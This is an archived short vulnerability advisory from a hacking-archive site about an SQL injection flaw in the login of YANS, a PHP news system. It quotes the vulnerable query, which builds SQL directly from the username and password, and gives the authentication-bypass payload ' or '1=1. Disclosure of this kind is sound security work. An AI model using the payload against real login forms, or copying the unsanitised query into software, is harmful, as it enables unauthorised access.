AOH :: HP Unsorted Y :: B06-5646.HTM

Y.A.N.S sql injection



Y.A.N.S sql injection
Y.A.N.S sql injection



Product: YANS (yet another news system)
Link: http://sourceforge.net/projects/yans/ 

vuln code:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());
        
simple sql injection
' or '1=1
' or '1=1

-navairum

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.